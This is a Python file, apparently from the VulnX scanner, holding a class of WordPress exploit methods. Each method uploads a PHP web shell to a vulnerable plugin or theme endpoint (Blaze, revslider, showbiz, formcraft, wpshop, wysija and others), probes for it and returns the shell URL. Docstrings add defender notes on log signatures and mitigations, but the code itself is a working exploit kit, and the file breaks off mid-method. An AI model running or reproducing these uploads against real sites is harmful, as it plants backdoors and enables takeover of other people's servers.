
from __future__ import (absolute_import, division, print_function)
from common.colors import failexploit, vulnexploit, que, info, good,run,W

import re
import random
import datetime
import requests
import os

# Year and month are captured once, at import time. The dated checks in this
# file use them to build wp-content/uploads/<YYYY>/<MM>/ style paths, so a
# long-running process keeps the values from when the module was loaded.
now = datetime.datetime.now()
year = '{0:%Y}'.format(now)
month = '{0:%m}'.format(now)


class WPExploits():

    def __init__(self, url, headers):
        """Remember the target base URL and the request-header mapping.

        ``headers`` is stored by reference, not copied. The wp_* methods in
        this class write keys into ``self.headers`` (and wp_revslider rebinds
        it), so the caller's dict is modified as checks run.
        """
        self.url, self.headers = url, headers

    def wp_blaze(self):
        """Send shell/VulnX.php to the Blaze SlideShow album handler.

        Issues one POST (``task=blaze_add_new_album``) to
        ``/wp-admin/admin.php?page=blaze_manage`` and searches the response
        body for an ``/uploads/blaze/<folder>/big/VulnX.php`` path.

        Returns:
            dict with ``url``, ``name`` and ``status``; the match branch is
            written to add ``shell`` (see the review note on that branch).

        Defender notes: in access logs this shows up as a POST to the
        ``blaze_manage`` admin page carrying ``task=blaze_add_new_album``; a
        successful upload would leave ``VulnX.php`` under
        ``wp-content/uploads/blaze/``. Removing or updating the plugin and
        denying PHP execution under ``wp-content/uploads`` are the usual
        mitigations.
        """
        # Writes into the shared self.headers dict; the key stays set for
        # every later request made through this instance.
        self.headers['Content_Type'] = 'multipart/form-data'
        regex = re.compile(r'\/uploads\/blaze\/(.*?)\/big\/VulnX.php')
        options = {
            # The file handle is opened here and never closed in this method.
            'album_img': [open('shell/VulnX.php', 'rb')],
            'task': 'blaze_add_new_album',
            'album_name': '',
            'album_desc': ''
        }
        endpoint = self.url + "/wp-admin/admin.php?page=blaze_manage"
        # verify=False: TLS certificate validation is disabled for this request.
        content = requests.post(endpoint, data=options, headers=self.headers,verify=False).text
        check_blaze = re.findall(regex, content)
        if check_blaze:
            # NOTE(review): .group(1) is called on the value returned by
            # re.findall -- confirm this branch runs as intended before
            # trusting status=True output from this method.
            uploadfolder = check_blaze.group(1)
            dump_data = self.url + "/wp-content/uploads/blaze/"+uploadfolder+"/big/VulnX.php?Vuln=X"
            return dict(
                url=self.url,
                name="Blaze SlideShow ",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="Blaze SlideShow ",
                status=False
            )

    def wp_catpro(self):
        """Send shell/VulnX.php to the Catpro album handler.

        Issues one POST (``task=cpr_add_new_album``) to
        ``/wp-admin/admin.php?page=catpro_manage`` and searches the response
        body with the pattern compiled in ``regex``.

        Returns:
            dict with ``url``, ``name`` and ``status``; the match branch is
            written to add ``shell`` (see the review note on that branch).

        Defender notes: the log artifact is a POST to the ``catpro_manage``
        admin page carrying ``task=cpr_add_new_album``; the result URL this
        method builds points under ``wp-content/uploads/catpro/``. Denying
        PHP execution under ``wp-content/uploads`` and removing or updating
        the plugin are the usual mitigations.
        """
        regex = re.compile(r'\/uploads\/blaze\/(.*?)\/big\/VulnX.php')
        # Writes into the shared self.headers dict; the key persists.
        self.headers['Content_Type'] = 'multipart/form-data'
        options = {
            # The file handle is opened here and never closed in this method.
            'album_img': [open('shell/VulnX.php', 'rb')],
            'task': 'cpr_add_new_album',
            'album_name': '',
            'album_desc': ''
        }
        endpoint = self.url + "/wp-admin/admin.php?page=catpro_manage"
        # verify=False: TLS certificate validation is disabled for this request.
        content = requests.post(endpoint, data=options,headers=self.headers,verify=False).text
        check_catpro = re.findall(regex, content)
        if check_catpro:
            # NOTE(review): .group(1) is called on the value returned by
            # re.findall -- confirm this branch runs as intended.
            uploadfolder = check_catpro.group(1)
            dump_data = self.url + "/wp-content/uploads/catpro/"+uploadfolder+"/big/VulnX.php?Vuln=X"
            return dict(
                url=self.url,
                name="Catpro   ",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="Catpro         ",
                status=False
            )

    def wp_cherry(self):
        """Send shell/VulnX.php to the cherry-plugin import-export uploader.

        POSTs to ``.../cherry-plugin/admin/import-export/upload.php``, then
        GETs ``.../import-export/VulnX.php?Vuln=X`` and reports success when
        the body of that second response contains ``Vuln X``.

        Returns:
            dict with ``url``, ``name``, ``status`` and, on a match,
            ``shell`` (the probed URL).

        Defender notes: the pair of requests above (POST to ``upload.php``
        followed by a GET for ``VulnX.php`` in the same directory) is the
        access-log signature. A ``VulnX.php`` file in the plugin's
        ``import-export`` directory indicates the upload was accepted.
        Removing or updating the plugin is the mitigation.
        """
        # Writes into the shared self.headers dict; the key persists.
        self.headers['Content_Type'] = 'multipart/form-data'
        options = {
            # The file handle is opened here and never closed in this method.
            'file': open('shell/VulnX.php', 'rb')
        }
        endpoint = self.url + "/wp-content/plugins/cherry-plugin/admin/import-export/upload.php"
        # verify=False on both requests: TLS certificate validation is off.
        requests.post(endpoint, data=options,headers=self.headers,verify=False)
        dump_data = self.url + "/wp-content/plugins/cherry-plugin/admin/import-export/VulnX.php?Vuln=X"
        content = requests.get(dump_data,headers=self.headers,verify=False).text
        # Success is decided only by this marker string in the probe response.
        check_cherry = re.findall("Vuln X", content)
        if check_cherry:
            return dict(
                url=self.url,
                name="CherryFramework ",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="CherryFramework ",
                status=False
            )

    def wp_dm(self):
        """Send shell/VulnX.php with a ``dm_upload`` field to the site root.

        POSTs to ``self.url`` itself (no path appended), then GETs
        ``/wp-content/plugins/downloads-manager/upload/VulnX.php?Vuln=X`` and
        reports success when that response body contains ``Vuln X``.

        Returns:
            dict with ``url``, ``name``, ``status`` and, on a match,
            ``shell`` (the probed URL).

        Defender notes: look for a POST to the site root carrying the
        ``upfile`` and ``dm_upload`` fields, followed by a GET for
        ``VulnX.php`` under ``downloads-manager/upload/``. Removing or
        updating the plugin and blocking PHP execution in its upload
        directory are the usual mitigations.
        """
        # Writes into the shared self.headers dict; the key persists.
        self.headers['Content_Type'] = 'multipart/form-data'
        options = {
            # The file handle is opened here and never closed in this method.
            'upfile': open('shell/VulnX.php', 'rb'),
            'dm_upload': ''
        }
        # verify=False on both requests: TLS certificate validation is off.
        # The .text of this first response is read and discarded.
        requests.post(self.url, data=options,headers=self.headers,verify=False).text
        dump_data = self.url + "/wp-content/plugins/downloads-manager/upload/VulnX.php?Vuln=X"
        content = requests.get(dump_data,headers=self.headers,verify=False).text
        check_dm = re.findall("Vuln X", content)
        if check_dm:
            return dict(
                url=self.url,
                name="Download Manager ",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="Download Manager ",
                status=False
            )

    def wp_powerzoomer(self):
        """Send shell/VulnX.php to the PowerZoomer album handler.

        Issues one POST (``task=pwz_add_new_album``) to
        ``/wp-admin/admin.php?page=powerzoomer_manage`` and searches the
        response body for an ``/uploads/powerzoomer/<folder>/big/VulnX.php``
        path.

        Returns:
            dict with ``url``, ``name`` and ``status``; the match branch is
            written to add ``shell`` (see the review note on that branch).

        Defender notes: the log artifact is a POST to the
        ``powerzoomer_manage`` admin page carrying ``task=pwz_add_new_album``;
        an accepted upload would leave ``VulnX.php`` under
        ``wp-content/uploads/powerzoomer/``. Denying PHP execution under
        ``wp-content/uploads`` and removing or updating the plugin are the
        usual mitigations.
        """
        regex = r'\/uploads\/powerzoomer\/(.*?)\/big\/VulnX.php'
        endpoint = self.url + "/wp-admin/admin.php?page=powerzoomer_manage"
        # Writes into the shared self.headers dict; the key persists.
        self.headers['Content_Type'] = 'multipart/form-data'
        options = {
            # The file handle is opened here and never closed in this method.
            'album_img': [open('shell/VulnX.php', 'rb')],
            'task': 'pwz_add_new_album',
            'album_name': '',
            'album_desc': ''
        }
        # verify=False: TLS certificate validation is disabled for this request.
        response = requests.post(endpoint, data=options,headers=self.headers,verify=False).text
        check_powerzoomer = re.findall(regex, response)
        if check_powerzoomer:
            # NOTE(review): .group(1) is called on the value returned by
            # re.findall -- confirm this branch runs as intended.
            uploadfolder = check_powerzoomer.group(1)
            dump_data = self.url + "/wp-content/uploads/powerzoomer/" + uploadfolder+"/big/VulnX.php?Vuln=X"
            return dict(
                url=self.url,
                name="PowerZoom      ",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="PowerZoom       ",
                status=False
            )

    def wp_revslider(self):
        """Send shell/VulnX.zip to the revslider update action, then probe.

        POSTs ``action=revslider_ajax_action`` / ``client_action=update_plugin``
        to ``/wp-admin/admin-ajax.php``, then requests ``VulnX.php`` under
        thirteen ``.../revslider/temp/update_extract/...`` locations (the
        plugin directory plus twelve theme-bundled copies) and reports the
        first whose body contains ``Vuln X``.

        Returns:
            dict with ``url``, ``name`` and ``status``. On a match ``shell``
            is also set, but always to the empty string, so the result
            identifies which probe matched only through ``name``.

        Side effects:
            Rebinds ``self.headers`` to a new three-key dict; every method
            called on this instance afterwards uses that dict.

        Defender notes: a POST to ``admin-ajax.php`` with the two action
        fields above, followed by a burst of requests for
        ``temp/update_extract/revslider/VulnX.php`` across plugin and theme
        paths, is the access-log signature. The probe calls pass the header
        dict positionally, which is the ``data`` slot of ``requests.post``
        and the ``params`` slot of ``requests.get``, so ``Cookie``,
        ``Content_Type`` and ``User-Agent`` should appear as form or query
        fields on those requests rather than as HTTP headers. Updating
        revslider (including copies bundled inside themes) and clearing any
        ``temp/update_extract`` directories are the usual mitigations.
        """
        endpoint = self.url + "/wp-admin/admin-ajax.php"
        # Replaces, rather than updates, the header dict given to __init__.
        self.headers = {
            'Cookie': '',
            'Content_Type': 'form-data',
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
        }
        options = {
            'action': 'revslider_ajax_action',
            'client_action': 'update_plugin',
            # The file handle is opened here and never closed in this method.
            'update_file': [open('shell/VulnX.zip', 'rb')]
        }
        # verify=False: TLS certificate validation is disabled for this request.
        requests.post(endpoint, data=options,headers=self.headers,verify=False)
        # The thirteen probes below run unconditionally and sequentially; none
        # of them passes verify=False, and the first one is a POST while the
        # rest are GETs.
        revslidera = requests.post(
            self.url+"/wp-content/plugins/revslider/temp/update_extract/revslider/VulnX.php", self.headers).text
        revsliderb = requests.get(
            self.url+"/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php", self.headers).text
        revsliderc = requests.get(
            self.url+"/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php", self.headers).text
        revsliderd = requests.get(
            self.url+"/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php", self.headers).text
        revslidere = requests.get(
            self.url+"/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/revslid.texter/VulnX.php", self.headers).text
        revsliderf = requests.get(
            self.url+"/wp-content/themes/medicate/script/revslider/temp/update_extract/revslider/VulnX.php", self.headers).text
        revsliderg = requests.get(
            self.url+"/wp-content/themes/centum/revslider/temp/update_extract/revslider/VulnX.php", self.headers).text
        revsliderh = requests.get(
            self.url+"/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/revslider/VulnX.php", self.headers).text
        revslideri = requests.get(
            self.url+"/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php", self.headers).text
        revsliderj = requests.get(
            self.url+"/wp-content/themes/pindol/revslider/temp/update_extract/revslider/VulnX.php", self.headers).text
        revsliderk = requests.get(
            self.url+"/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php", self.headers).text
        revsliderl = requests.get(
            self.url+"/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php", self.headers).text
        revsliderm = requests.get(
            self.url+"/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php", self.headers).text
        # Each probe body is checked for the same marker string.
        check_revslidera = re.findall("Vuln X", revslidera)
        check_revsliderb = re.findall("Vuln X", revsliderb)
        check_revsliderc = re.findall("Vuln X", revsliderc)
        check_revsliderd = re.findall("Vuln X", revsliderd)
        check_revslidere = re.findall("Vuln X", revslidere)
        check_revsliderf = re.findall("Vuln X", revsliderf)
        check_revsliderg = re.findall("Vuln X", revsliderg)
        check_revsliderh = re.findall("Vuln X", revsliderh)
        check_revslideri = re.findall("Vuln X", revslideri)
        check_revsliderj = re.findall("Vuln X", revsliderj)
        check_revsliderk = re.findall("Vuln X", revsliderk)
        check_revsliderl = re.findall("Vuln X", revsliderl)
        check_revsliderm = re.findall("Vuln X", revsliderm)
        # dump_data is never assigned a URL, so every success result below
        # reports shell="".
        dump_data = ""
        if check_revslidera:
            return dict(
                url=self.url,
                name="revslidera     ",
                status=True,
                shell=dump_data
            )

        elif check_revsliderb:
            return dict(
                url=self.url,
                name="revsliderb",
                status=True,
                shell=dump_data
            )

        elif check_revsliderc:
            return dict(
                url=self.url,
                name="revsliderc",
                status=True,
                shell=dump_data
            )

        elif check_revsliderd:
            return dict(
                url=self.url,
                name="revsliderd",
                status=True,
                shell=dump_data
            )

        elif check_revslidere:
            return dict(
                url=self.url,
                name="revslidere",
                status=True,
                shell=dump_data
            )

        elif check_revsliderf:
            return dict(
                url=self.url,
                name="revsliderf",
                status=True,
                shell=dump_data
            )

        elif check_revsliderg:
            return dict(
                url=self.url,
                name="revsliderg",
                status=True,
                shell=dump_data
            )

        elif check_revsliderh:
            return dict(
                url=self.url,
                name="revsliderh",
                status=True,
                shell=dump_data
            )

        elif check_revslideri:
            return dict(
                url=self.url,
                name="revslideri",
                status=True,
                shell=dump_data
            )

        elif check_revsliderj:
            return dict(
                url=self.url,
                name="revsliderj",
                status=True,
                shell=dump_data
            )

        elif check_revsliderk:
            return dict(
                url=self.url,
                name="revsliderk",
                status=True,
                shell=dump_data
            )

        elif check_revsliderl:
            return dict(
                url=self.url,
                name="revsliderl",
                status=True,
                shell=dump_data
            )

        elif check_revsliderm:
            return dict(
                url=self.url,
                name="revsliderm",
                status=True,
                shell=dump_data
            )

        else:
            return dict(
                url=self.url,
                name="Revsmoder      ",
                status=False
            )

    def wp_fromcraft(self):
        """Send shell/VulnX.php to the formcraft file-upload endpoint.

        POSTs a ``files[]`` field to
        ``/wp-content/plugins/formcraft/file-upload/server/php/`` and reports
        success when the response body contains the substring ``"files``.
        No follow-up request is made to the reported URL.

        Returns:
            dict with ``url``, ``name``, ``status`` and, on a match,
            ``shell`` (a URL under ``.../server/php/files/``).

        Defender notes: status=True here reflects only the upload response
        text, not a confirmed file, so treat it as unverified. The log
        artifact is a POST to the ``file-upload/server/php/`` path; an
        accepted upload would leave ``VulnX.php`` in its ``files/``
        subdirectory. Removing or updating the plugin is the mitigation.
        """
        # The file handle is opened here and never closed in this method.
        shell = open('shell/VulnX.php', 'rb')
        fields = "files[]"
        # Writes into the shared self.headers dict; the key persists.
        self.headers['Content_Type'] = 'multipart/form-data'
        options = {
            fields: shell
        }
        endpoint = self.url + "/wp-content/plugins/formcraft/file-upload/server/php/"
        # verify=False: TLS certificate validation is disabled for this request.
        response = requests.post(endpoint, data=options,headers=self.headers,verify=False).text
        dump_data = self.url + "/wp-content/plugins/formcraft/file-upload/server/php/files/VulnX.php?Vuln=X"
        check_fromcraft = re.findall("\"files", response)
        if check_fromcraft:
            return dict(
                url=self.url,
                name=" Formcraft       ",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="Formcrafts      ",
                status=False
            )

    def wp_jobmanager(self):
        """Send shell/VulnX.gif to the Job Manager ajax upload route.

        POSTs a ``file[]`` field to ``/jm-ajax/upload_file/``, then GETs
        ``/wp-content/uploads/job-manager-uploads/file/<year>/<month>/VulnX.gif``
        and reports success when that response's ``content-type`` header
        contains ``image/gif``. ``year`` and ``month`` are the module-level
        values.

        Returns:
            dict with ``url``, ``name``, ``status`` and, on a match,
            ``shell`` (the probed URL).

        Raises:
            KeyError: if the probe response carries no content-type header.

        Defender notes: the log artifact is a POST to ``/jm-ajax/upload_file/``
        followed by a GET for ``VulnX.gif`` under the dated
        ``job-manager-uploads/file/`` directory. Success is inferred from a
        response header alone, so a status=True result does not show what
        the stored file contains. Updating the plugin is the mitigation.
        """
        regex = re.compile(r'image\/gif')
        endpoint = self.url + "/jm-ajax/upload_file/"
        # The file handle is opened here and never closed in this method.
        image = open('shell/VulnX.gif', 'rb')
        field = "file[]"
        # Both header keys below are written into the shared self.headers
        # dict and persist for later calls.
        self.headers['content-type'] = 'multipart/form-data'
        options = {
            field: image
        }
        self.headers['Content_Type'] = 'multipart/form-data'
        # verify=False on both requests: TLS certificate validation is off.
        requests.post(endpoint, data=options,headers=self.headers,verify=False).text
        dump_data = self.url + "/wp-content/uploads/job-manager-uploads/file/" + \
            year+"/"+month+"/VulnX.gif"
        response = requests.get(dump_data,headers=self.headers,verify=False)
        res = response.headers['content-type']
        check_jobmanager = re.findall(regex, res)
        if check_jobmanager:
            return dict(
                url=self.url,
                name="Job Manager    ",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="Job Manager     ",
                status=False
            )

    # Showbiz Pro
    def wp_showbiz(self):
        """Send shell/VulnX.php to the Showbiz update action, then probe.

        Picks one of six hard-coded User-Agent strings at random, POSTs
        ``action=showbiz_ajax_action`` / ``client_action=update_plugin`` to
        ``/wp-admin/admin-ajax.php``, then GETs
        ``/wp-content/plugins/showbiz/temp/update_extract/VulnX.php?Vuln=X``
        and reports success when that body contains ``Vuln X``.

        Returns:
            dict with ``url``, ``name``, ``status`` and, on a match,
            ``shell`` (the probed URL).

        Defender notes: because the User-Agent is rotated, matching on it
        is unreliable; the stable artifacts are the two action fields in the
        ``admin-ajax.php`` POST and the request for ``VulnX.php`` under
        ``showbiz/temp/update_extract/``. Updating the plugin and clearing
        its ``temp/update_extract`` directory are the usual mitigations.
        """
        endpoint = self.url + "/wp-admin/admin-ajax.php"
        def random_UserAgent():
            # Returns one entry of the fixed list below, chosen with
            # random.choice.
            useragents_rotate = [
                "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0",
                "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0",
                "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
                "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
                "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
                "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31"
            ]
            useragents_random = random.choice(useragents_rotate)
            return useragents_random
        useragent = random_UserAgent()
        # Both assignments write into the shared self.headers dict, so the
        # chosen User-Agent also applies to later methods on this instance.
        self.headers['User-Agent'] = useragent
        self.headers['Content_Type'] = 'multipart/form-data'
        options = {
            "action": "showbiz_ajax_action",
            "client_action": "update_plugin",
            # The file handle is opened here and never closed in this method.
            "update_file": [open('shell/VulnX.php', 'rb')]
        }
        # verify=False: TLS certificate validation is disabled for this request.
        requests.post(endpoint, data=options,headers=self.headers,verify=False).text
        dump_data = self.url + "/wp-content/plugins/showbiz/temp/update_extract/VulnX.php?Vuln=X"
        # This probe passes `options` positionally (the params slot of
        # requests.get) and sets neither headers nor verify.
        res = requests.get(dump_data, options).text
        check_showbiz = re.findall("Vuln X", res)
        if check_showbiz:
            return dict(
                url=self.url,
                name="Showbiz Pro    ",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="Showbiz Pro     ",
                status=False
            )

    def wp_synoptic(self):
        """Send shell/VulnX.php to the synoptic theme's avatar uploader.

        POSTs a ``qqfile`` field to
        ``/wp-content/themes/synoptic/lib/avatarupload/upload.php``, then GETs
        ``/wp-content/uploads/markets/avatars/VulnX.php?Vuln=X`` and reports
        success when that body contains ``Vuln X``.

        Returns:
            dict with ``url``, ``name``, ``status`` and, on a match,
            ``shell`` (the probed URL).

        Defender notes: the log artifact is a POST to the theme's
        ``avatarupload/upload.php`` followed by a GET for ``VulnX.php`` under
        ``uploads/markets/avatars/``. Denying PHP execution under
        ``wp-content/uploads`` and removing or updating the theme are the
        usual mitigations.
        """
        endpoint = self.url + "/wp-content/themes/synoptic/lib/avatarupload/upload.php"
        # The file handle is opened here and never closed in this method.
        shell = open('shell/VulnX.php', 'rb')
        field = "qqfile"
        # Writes into the shared self.headers dict; the key persists.
        self.headers['Content_Type'] = 'multipart/form-data'
        options = {
            field: shell
        }
        # verify=False on both requests: TLS certificate validation is off.
        requests.post(endpoint, data=options,headers=self.headers,verify=False).text
        dump_data = self.url + "/wp-content/uploads/markets/avatars/VulnX.php?Vuln=X"
        res = requests.get(dump_data,headers=self.headers,verify=False).text
        check_synoptic = re.findall("Vuln X", res)
        if check_synoptic:
            return dict(
                url=self.url,
                name="Synoptic        ",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="Synoptic         ",
                status=False
            )

    # WPshop eCommerce method
    def wp_shop(self):
        """Send shell/VulnX.php to the wpshop ajaxUpload handler.

        POSTs a ``wpshop_file`` field to
        ``/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload``,
        then GETs ``/wp-content/uploads/VulnX.php?Vuln=X`` and reports success
        when that body contains ``Vuln X``.

        Returns:
            dict with ``url``, ``name``, ``status`` and, on a match,
            ``shell`` (the probed URL).

        Defender notes: the log artifact is a POST to ``wpshop/includes/ajax.php``
        with ``elementCode=ajaxUpload``, followed by a GET for ``VulnX.php``
        directly under ``wp-content/uploads/``. Denying PHP execution under
        ``wp-content/uploads`` and updating the plugin are the usual
        mitigations.
        """
        endpoint = self.url + "/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload"
        # The file handle is opened here and never closed in this method.
        shell = open('shell/VulnX.php', 'rb')
        field = "wpshop_file"
        # Writes into the shared self.headers dict; the key persists.
        self.headers['Content_Type'] = 'multipart/form-data'
        options = {
            field: shell
        }
        # verify=False on both requests: TLS certificate validation is off.
        requests.post(endpoint, data=options,headers=self.headers,verify=False)
        dump_data = self.url + "/wp-content/uploads/VulnX.php?Vuln=X"
        res = requests.get(dump_data,headers=self.headers,verify=False).text
        check_shop = re.findall("Vuln X", res)
        if check_shop:
            return dict(
                url=self.url,
                name="WP Shop         ",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="WP Shop         ",
                status=False
            )

    # Simple Ads Manager
    def wp_adsmanager(self):
        """Send shell/VulnX.php to the Simple Ads Manager ajax admin script.

        POSTs ``action=upload_ad_image`` with an ``uploadfile`` field to
        ``/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php``, then
        GETs ``.../simple-ads-manager/VulnX.php?Vuln=X/`` and reports success
        when the body of that second response contains
        ``{"status":"success"}``.

        Returns:
            dict with ``url``, ``name``, ``status`` and, on a match,
            ``shell`` (the probed URL, including its trailing slash).

        Defender notes: the log artifact is a POST to ``sam-ajax-admin.php``
        with ``action=upload_ad_image`` followed by a GET for ``VulnX.php`` in
        the plugin directory. Updating or removing the plugin is the
        mitigation.
        """
        endpoint = self.url + "/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php"
        # The file handle is opened here and never closed in this method.
        shell = open('shell/VulnX.php', 'rb')
        # Writes into the shared self.headers dict; the key persists.
        self.headers['Content_Type'] = 'multipart/form-data'
        options = {
            'uploadfile': shell,
            'action': 'upload_ad_image',
            'path': ''
        }
        # verify=False on both requests: TLS certificate validation is off.
        requests.post(endpoint, data=options,headers=self.headers,verify=False)
        dump_data = self.url + "/wp-content/plugins/simple-ads-manager/VulnX.php?Vuln=X/"
        res = requests.get(dump_data,headers=self.headers,verify=False).text
        # The success marker is looked for in the probe (GET) response, not in
        # the response to the upload POST, which is discarded.
        check_adsmanager = re.findall("{\"status\":\"success\"}", res)
        if check_adsmanager:
            return dict(
                url=self.url,
                name="Ads Manager    ",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="Ads Manager     ",
                status=False
            )

    # Wysija Newsletters
    def wp_wysija(self):
        """Send shell/VulnX.php to the Wysija theme-upload action.

        POSTs ``action=themeupload`` with ``overwriteexistingtheme=on`` to
        ``/wp-admin/admin-post.php?page=wysija_campaigns&action=themes``, then
        GETs ``/wp-content/uploads/wysija/themes/VulnX/VulnX.php?Vuln=X`` and
        reports success when that body contains ``Vuln X``.

        Returns:
            dict with ``url``, ``name``, ``status`` and, on a match,
            ``shell`` (the probed URL).

        Defender notes: the log artifact is a POST to ``admin-post.php`` with
        ``page=wysija_campaigns&action=themes`` followed by a GET under
        ``uploads/wysija/themes/VulnX/``. The request carries the fixed
        Chrome/26 User-Agent set below. Denying PHP execution under
        ``wp-content/uploads`` and updating the plugin are the usual
        mitigations.
        """
        endpoint = self.url + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes"
        # The file handle is opened here and never closed in this method.
        shell = open('shell/VulnX.php', 'rb')
        # Both assignments write into the shared self.headers dict and
        # persist for later calls on this instance.
        self.headers['User-Agent'] = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
        self.headers['Content_Type'] = 'form-data'
        options = {
            'theme': shell,
            'overwriteexistingtheme': 'on',
            'action': 'themeupload',
            'submitter': 'Upload'
        }
        # verify=False on both requests: TLS certificate validation is off.
        requests.post(endpoint, data=options,headers=self.headers,verify=False).text
        dump_data = self.url + "/wp-content/uploads/wysija/themes/VulnX/VulnX.php?Vuln=X"
        res = requests.get(dump_data,headers=self.headers,verify=False).text
        check_wysija = re.findall("Vuln X", res)
        if check_wysija:
            return dict(
                url=self.url,
                name="Wysija         ",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="Wysija         ",
                status=False
            )

    def wp_inboundiomarketing(self):
        """Send shell/VulnX.php to the inboundio-marketing CSV uploader.

        POSTs a ``file`` field to
        ``.../inboundio-marketing/admin/partials/csv_uploader.php``, then GETs
        ``.../admin/partials/uploaded_csv/VulnX.php?Vuln=X`` and reports
        success when that body contains ``Vuln X``.

        Returns:
            dict with ``url``, ``name``, ``status`` and, on a match,
            ``shell`` (the probed URL).

        Defender notes: the log artifact is a POST to ``csv_uploader.php``
        followed by a GET for ``VulnX.php`` in the plugin's ``uploaded_csv``
        directory. Removing or updating the plugin is the mitigation.
        """
        endpoint = self.url + "/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php"
        # The file handle is opened here and never closed in this method.
        shell = open('shell/VulnX.php', 'rb')
        # Writes into the shared self.headers dict; the key persists.
        self.headers['Content_Type'] = 'multipart/form-data'
        options = {
            'file': shell,
        }
        # verify=False on both requests: TLS certificate validation is off.
        requests.post(endpoint, data=options,headers=self.headers,verify=False).text
        dump_data = self.url + "/wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/VulnX.php?Vuln=X"
        res = requests.get(dump_data,headers=self.headers,verify=False).text
        check_inboundiomarketing = re.findall("Vuln X", res)
        if check_inboundiomarketing:
            return dict(
                url=self.url,
                name="InBoundio Market",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="InBoundio Market",
                status=False
            )

    def wp_adblockblocker(self):
        """Send shell/VulnX.php via the ``getcountryuser`` ajax action.

        POSTs a ``popimg`` field to
        ``/wp-admin/admin-ajax.php?action=getcountryuser&cs=2``, then GETs
        ``/wp-content/uploads/<year>/<month>/VulnX.php?Vuln=X`` and reports
        success when that body contains ``Vuln X``. ``year`` and ``month``
        are the module-level values.

        Returns:
            dict with ``url``, ``name``, ``status`` and, on a match,
            ``shell`` (the probed URL).

        Defender notes: the log artifact is a POST to ``admin-ajax.php`` with
        ``action=getcountryuser&cs=2`` followed by a GET for ``VulnX.php`` in
        the current dated uploads directory. Denying PHP execution under
        ``wp-content/uploads`` and updating the plugin are the usual
        mitigations.
        """
        endpoint = self.url + "/wp-admin/admin-ajax.php?action=getcountryuser&cs=2"
        # The file handle is opened here and never closed in this method.
        shell = open('shell/VulnX.php', 'rb')
        # Writes into the shared self.headers dict; the key persists.
        self.headers['Content_Type'] = 'multipart/form-data'
        options = {
            'popimg': shell,
        }
        # verify=False on both requests: TLS certificate validation is off.
        requests.post(endpoint, data=options,headers=self.headers,verify=False)
        dump_data = self.url + "/wp-content/uploads/"+year+"/"+month+"/VulnX.php?Vuln=X"
        res = requests.get(dump_data,headers=self.headers,verify=False).text
        if re.findall("Vuln X", res):
            return dict(
                url=self.url,
                name="AdBlocker       ",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="AdBlocker       ",
                status=False
            )

    def wp_levoslideshow(self):
        """Send shell/VulnX.php to the LevoSlideshow album handler.

        Issues one POST (``task=lvo_add_new_album``) to
        ``/wp-admin/admin.php?page=levoslideshow_manage`` and searches the
        response body for ``/uploads/levoslideshow/<folder>/big/VulnX.php/``.

        Returns:
            dict with ``url``, ``name`` and ``status``; the match branch is
            written to add ``shell`` (see the review note on that branch).

        Defender notes: the log artifact is a POST to the
        ``levoslideshow_manage`` admin page carrying
        ``task=lvo_add_new_album``; an accepted upload would leave
        ``VulnX.php`` under ``wp-content/uploads/levoslideshow/``. Denying PHP
        execution under ``wp-content/uploads`` and removing or updating the
        plugin are the usual mitigations.
        """
        endpoint = self.url + "/wp-admin/admin.php?page=levoslideshow_manage"
        # The file handle is opened here and never closed in this method.
        shell = open('shell/VulnX.php', 'rb')
        # Writes into the shared self.headers dict; the key persists.
        self.headers['Content_Type'] = 'multipart/form-data'
        options = {
            'album_img': shell,
            'task': 'lvo_add_new_album',
            'album_name': '',
